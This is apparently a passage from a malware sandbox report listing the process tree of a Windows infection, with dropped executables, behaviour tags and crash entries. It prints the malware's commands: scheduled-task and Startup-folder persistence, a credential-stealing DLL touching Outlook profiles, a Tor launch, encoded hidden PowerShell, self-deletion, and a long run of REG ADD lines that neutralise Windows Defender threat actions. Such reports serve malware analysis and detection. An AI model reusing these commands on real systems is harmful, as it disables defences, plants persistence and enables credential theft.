C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 13564⤵
- Program crash
PID:5732 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Kog456fPoi_qlj0gOuQ1ue72.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe" & exit4⤵PID:6064
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Kog456fPoi_qlj0gOuQ1ue72.exe" /f5⤵
- Kills process with taskkill
PID:5268 -
C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe"C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2712 -
C:\Windows\SysWOW64\attrib.exeattrib -?4⤵
- Views/modifies file attributes
PID:5056 -
C:\Windows\SysWOW64\cmd.execmd /c cmd < Inebriarti.htm & ping -n 5 localhost4⤵PID:3788
-
C:\Windows\SysWOW64\cmd.execmd5⤵PID:4460
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"6⤵
- Enumerates processes with tasklist
PID:5084 -
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"6⤵PID:5912
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^DPPUlpMDoxxhVrUIPtlDSFKoNmARJTULbxHxsooLczeCBvhhRbTNaFvXtGiKJUTgAJQAcAsHWmomCiGsjjZjquaSYKfKqbwAmNeS$" Strette.htm6⤵PID:79052
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pifTal.exe.pif H6⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:109144 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pifC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif7⤵PID:5356
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 56⤵
- Runs ping.exe
PID:109156 -
C:\Windows\SysWOW64\PING.EXEping -n 5 localhost5⤵
- Runs ping.exe
PID:109376 -
C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe"C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
PID:3244 -
C:\ProgramData\50543188494393494002.exe"C:\ProgramData\50543188494393494002.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
PID:5800 -
C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe"C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
PID:3288 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\62eca45584\6⤵PID:376
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\62eca45584\7⤵PID:5888
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR "C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe" /F6⤵
- Creates scheduled task(s)
PID:4700 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\110809d565579c\cred.dll, Main6⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- outlook_win_path
PID:4832 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 11085⤵
- Program crash
PID:876 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im FzbLA0y21wf4Eb_GXZGPAkPK.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe" & del C:\ProgramData\*.dll & exit4⤵PID:2400
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im FzbLA0y21wf4Eb_GXZGPAkPK.exe /f5⤵
- Kills process with taskkill
PID:6060 -
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
PID:3196 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 19284⤵
- Program crash
PID:4624 -
C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe"C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe"C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2020 -
C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe"C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:5060
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1216 -ip 12161⤵PID:3636
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1296
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1216 -ip 12161⤵PID:3368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1216 -ip 12161⤵PID:4980
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1216 -ip 12161⤵PID:3744
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1216 -ip 12161⤵PID:2380
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1216 -ip 12161⤵PID:756
-
C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe"C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4324 -
C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe"C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe"2⤵
- Executes dropped EXE
PID:5224
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1216 -ip 12161⤵PID:5244
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2284 -ip 22841⤵PID:5380
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1216 -ip 12161⤵PID:5696
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1744 -ip 17441⤵PID:5968
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3244 -ip 32441⤵PID:4332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5800 -ip 58001⤵PID:5680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5248
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3608 -ip 36081⤵PID:1156
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 472 -p 5436 -ip 54361⤵PID:5660
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3608 -ip 36081⤵PID:2076
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3608 -ip 36081⤵PID:3468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3608 -ip 36081⤵PID:2004
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global1⤵
- Process spawned unexpected child process
PID:5748 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global2⤵
- Loads dropped DLL
PID:5512 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5512 -s 6083⤵
- Program crash
PID:5116
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5512 -ip 55121⤵PID:4152
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3608 -ip 36081⤵PID:5304
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 3608 -ip 36081⤵PID:4376
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3608 -ip 36081⤵PID:5280
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:376
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:6860
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3608 -ip 36081⤵PID:1180
-
C:\Users\Admin\AppData\Local\Temp\3A8A.exeC:\Users\Admin\AppData\Local\Temp\3A8A.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
PID:4452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAAwAA==2⤵PID:5304
-
C:\Users\Admin\AppData\Local\Temp\3A8A.exeC:\Users\Admin\AppData\Local\Temp\3A8A.exe2⤵PID:3972
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:2476
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 8722⤵
- Program crash
PID:452
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2476 -ip 24761⤵PID:2488
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:2952
-
C:\Users\Admin\AppData\Local\Temp\4A1B.exeC:\Users\Admin\AppData\Local\Temp\4A1B.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1260 -
C:\Users\Admin\AppData\Local\Temp\4A1B.exeC:\Users\Admin\AppData\Local\Temp\4A1B.exe2⤵
- Executes dropped EXE
- Checks computer location settings
PID:5340 -
C:\Users\Admin\AppData\Local\Temp\4A1B.exe"C:\Users\Admin\AppData\Local\Temp\4A1B.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3880 -
C:\Users\Admin\AppData\Local\Temp\4A1B.exe"C:\Users\Admin\AppData\Local\Temp\4A1B.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Checks computer location settings
PID:6076 -
C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe"C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4980 -
C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe"C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe"6⤵PID:3760
-
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6116
-
C:\Users\Admin\AppData\Local\Temp\jwzeqsilllyafcnn.exe"C:\Users\Admin\AppData\Local\Temp\jwzeqsilllyafcnn.exe"1⤵
- Executes dropped EXE
PID:4040 -
C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe"C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe"2⤵PID:4668
-
C:\Users\Admin\AppData\Local\Temp\signed.exe"C:\Users\Admin\AppData\Local\Temp\signed.exe"3⤵
- Adds Run key to start application
PID:3916 -
C:\ProgramData\MsDrvSrvc.exe"C:\ProgramData\MsDrvSrvc.exe"4⤵PID:1524
-
C:\Windows\SysWOW64\schtasks.exe/create /tn COMSurrogate /st 00:00 /du 9999:59 /sc once /ri 1 /f /tr "powershell.exe -windowstyle hidden"2⤵
- Creates scheduled task(s)
PID:1524
-
C:\Users\Admin\AppData\Local\Temp\6DF1.exeC:\Users\Admin\AppData\Local\Temp\6DF1.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3204
-
C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exeC:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe1⤵PID:804
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 804 -s 4842⤵
- Program crash
PID:6220
-
C:\Users\Admin\AppData\Local\Temp\7BCD.exeC:\Users\Admin\AppData\Local\Temp\7BCD.exe1⤵
- Executes dropped EXE
- Checks computer location settings
PID:3484 -
C:\Users\Admin\AppData\Local\Temp\nijiccssjnaevyew.exe"C:\Users\Admin\AppData\Local\Temp\nijiccssjnaevyew.exe"2⤵PID:4052
-
C:\Users\Admin\AppData\Local\Temp\8AF1.exeC:\Users\Admin\AppData\Local\Temp\8AF1.exe1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3624
-
C:\Users\Admin\AppData\Local\Temp\987E.exeC:\Users\Admin\AppData\Local\Temp\987E.exe1⤵PID:4404
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 3402⤵
- Program crash
PID:5288
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:2448
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 8722⤵
- Program crash
PID:4332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 2448 -ip 24481⤵PID:6104
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 4404 -ip 44041⤵PID:5744
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:3548
-
C:\Users\Admin\AppData\Local\Temp\CE07.exeC:\Users\Admin\AppData\Local\Temp\CE07.exe1⤵
- Suspicious use of SetThreadContext
PID:4944 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"2⤵PID:4344
-
C:\Users\Admin\AppData\Local\Temp\EF2C.exeC:\Users\Admin\AppData\Local\Temp\EF2C.exe1⤵PID:3936
-
C:\Users\Admin\AppData\Local\Temp\EF2C.exeC:\Users\Admin\AppData\Local\Temp\EF2C.exe2⤵
- Loads dropped DLL
PID:1088
-
C:\Users\Admin\AppData\Local\Temp\F576.exeC:\Users\Admin\AppData\Local\Temp\F576.exe1⤵
- Suspicious use of SetThreadContext
PID:4904 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵PID:109088
-
C:\Users\Admin\AppData\Local\Temp\F7E8.exeC:\Users\Admin\AppData\Local\Temp\F7E8.exe1⤵PID:13680
-
C:\Users\Admin\AppData\Local\Temp\FB35.exeC:\Users\Admin\AppData\Local\Temp\FB35.exe1⤵PID:24408
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵
- Suspicious behavior: AddClipboardFormatListener
PID:65352 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 24408 -s 11322⤵
- Program crash
PID:65324
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:24400
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:41600
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:58704
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 24408 -ip 244081⤵PID:65492
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:64960
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:65252
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:73132
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:72848
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:85472
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:99312
-
C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exeC:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe bH /site_id 525403 /S1⤵
- Drops file in System32 directory
PID:109108 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD 
\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1464 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:4660
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
- Executes dropped EXE
PID:4052 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:5200
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:900
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:544
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:536
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4416
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:5892
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:5136
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4324
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:5748
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4824
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:5604
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5700
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4008
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:2464
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1468
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2448
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:5608
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3228
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2284
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:5288
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1884
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3260
-
